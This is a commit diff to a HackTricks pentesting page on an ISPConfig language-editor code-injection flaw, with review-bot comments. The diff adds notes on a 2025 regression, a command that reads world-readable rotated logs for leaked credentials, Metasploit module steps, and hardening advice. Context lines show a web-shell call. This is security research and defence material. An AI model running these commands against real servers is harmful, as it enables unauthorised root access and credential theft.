
Commit 506b9fd

Merge pull request #1867 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_ispconfig_20260206_131312
Research Update Enhanced src/network-services-pentesting/pen...
2 parents 923bafd + e1c9abf commit 506b9fd

1 file changed

Lines changed: 31 additions & 1 deletion

File tree

src/network-services-pentesting/pentesting-web/ispconfig.md

@@ -74,6 +74,18 @@ curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
7474

7575
If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
7676

77+
### 2025 regression (ISPConfig 3.3.0 / 3.3.0p1)
78+
79+
The language editor bug resurfaced in 3.3.0/3.3.0p1 and was fixed in **3.3.0p2**. Preconditions are unchanged (`admin_allow_langedit` and admin login). The same patch also addressed a monitor XSS and world-readable rotated logs.
80+
81+
**Notes:**
82+
- On 3.3.0/3.3.0p1, world-readable rotated logs under `/usr/local/ispconfig/interface/log/` may leak credentials if debug logging was enabled:
83+
84+
```bash
85+
find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
86+
```
87+
- Exploit steps match CVE-2023-46818; 3.3.0p2 adds extra checks before language editing.
88+
7789
### Python PoC
7890

7991
A ready-to-use exploit automates token handling and payload delivery:
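Review bot: the fenced `bash` block under the first `Notes:` bullet is not indented as part of that list item, so the list closes before it and the second bullet (`Exploit steps match CVE-2023-46818...`) renders as a separate list; indent the fence and its contents by two spaces to keep both bullets in one list. The permission check itself only matches `*.gz` files, so rotated logs that logrotate keeps uncompressed are not covered; either state that the check assumes compressed rotation or have admins list the directory permissions first (`ls -la /usr/local/ispconfig/interface/log/`) before relying on the `zcat` pipeline. Finally, the sentence claiming the same 3.3.0p2 patch also fixed a monitor XSS and world-readable rotated logs carries no citation where it is made; the ISPConfig 3.3.0p2 release post that this diff adds to the references belongs next to that sentence.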
@@ -85,9 +97,25 @@ Example run:
8597
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
8698
```
8799

100+
### Metasploit module (released July 2025)
101+
102+
Rapid7 added `exploit/linux/http/ispconfig_lang_edit_php_code_injection`, which can auto-enable `admin_allow_langedit` if the supplied admin account has system-config rights.
103+
104+
```text
105+
use exploit/linux/http/ispconfig_lang_edit_php_code_injection
106+
set RHOSTS 10.10.10.50
107+
set RPORT 8080
108+
set USERNAME admin
109+
set PASSWORD <admin_pass>
110+
set TARGETURI /
111+
run
112+
```
113+
114+
The module writes a base64-encoded payload through `records[]` and executes it, giving a PHP Meterpreter or custom payload.
115+
88116
### Hardening
89117

90-
- Upgrade to 3.2.11p1 or later
118+
- Upgrade to **3.2.11p1** or later for the original issue, and to **3.3.0p2** or later for the 2025 regression.
91119
- Disable the language editor unless strictly needed:
92120

93121
```
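Review bot: the module path `exploit/linux/http/ispconfig_lang_edit_php_code_injection` and the claim that it auto-enables `admin_allow_langedit` when the account has system-config rights are stated without a source in this hunk; link the module's own documentation or its pull request in metasploit-framework next to the paragraph so readers can verify the name and that behaviour. The example targets `10.10.10.50` on port `8080`, while the rest of the page (the `curl` line in the preceding hunk's header and the PoC run just above) uses `http://127.0.0.1:9001` through a port forward; align the values or say explicitly that they are placeholders. The closing sentence (`writes a base64-encoded payload through records[]`) should also tie back to the earlier description of the language-editor `records[]` parameter so the reader sees it is the same injection point, not a new one.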
@@ -103,5 +131,7 @@ admin_allow_langedit=no
103131
- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
104132
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
105133
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
134+
- [ISPConfig 3.3.0p2 Released – Security Update](https://www.ispconfig.org/blog/ispconfig-3-3-0p2-released-security-update/)
135+
- [CXSecurity WLB-2025070017 – Metasploit module for ISPConfig language_edit.php](https://cxsecurity.com/issue/WLB-2025070017)
106136

107137
{{#include ../../banners/hacktricks-training.md}}
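Review bot: the hardening list only revises the upgrade bullet, yet the 2025 regression section added earlier in this diff says 3.3.0/3.3.0p1 left rotated logs world-readable and possibly containing credentials; add a bullet telling admins to verify the permissions on `/usr/local/ispconfig/interface/log/` after upgrading, keep debug logging off in production, and rotate any credentials that may have been written to those logs. In the references, the CXSecurity entry (`WLB-2025070017`) is a third-party mirror of the Metasploit module; cite the module's page in the metasploit-framework repository as the primary source and keep the mirror, if at all, as a secondary link.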
